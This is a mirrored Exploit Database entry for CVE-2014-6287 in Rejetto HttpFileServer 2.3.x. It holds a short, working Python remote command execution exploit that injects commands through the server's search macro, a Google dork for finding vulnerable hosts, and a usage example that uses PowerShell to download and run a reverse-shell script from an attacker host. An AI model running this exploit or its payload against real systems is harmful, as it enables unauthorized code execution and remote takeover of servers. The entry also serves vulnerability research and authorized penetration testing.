Rejetto HttpFileServer 2.3.x – Remote Command Execution (3)

• Exploit Database
• 21 阅读

• 作者： Óscar Andreu
  日期： 2020-11-30
• 类别：

  • webapps
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/49125/

• # Exploit Title: Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
  # Google Dork: intext:"httpfileserver 2.3"
  # Date: 28-11-2020
  # Remote: Yes
  # Exploit Author: Óscar Andreu
  # Vendor Homepage: http://rejetto.com/
  # Software Link: http://sourceforge.net/projects/hfs/
  # Version: 2.3.x
  # Tested on: Windows Server 2008 , Windows 8, Windows 7
  # CVE : CVE-2014-6287
  
  #!/usr/bin/python3
  
  # Usage :python3 Exploit.py <RHOST> <Target RPORT> <Command>
  # Example: python3 HttpFileServer_2.3.x_rce.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.4/shells/mini-reverse.ps1')"
  
  import urllib3
  import sys
  import urllib.parse
  
  try:
  	http = urllib3.PoolManager()	
  	url = f'http://{sys.argv[1]}:{sys.argv[2]}/?search=%00{{.+exec|{urllib.parse.quote(sys.argv[3])}.}}'
  	print(url)
  	response = http.request('GET', url)
  	
  except Exception as ex:
  	print("Usage: python3 HttpFileServer_2.3.x_rce.py RHOST RPORT command")
  	print(ex)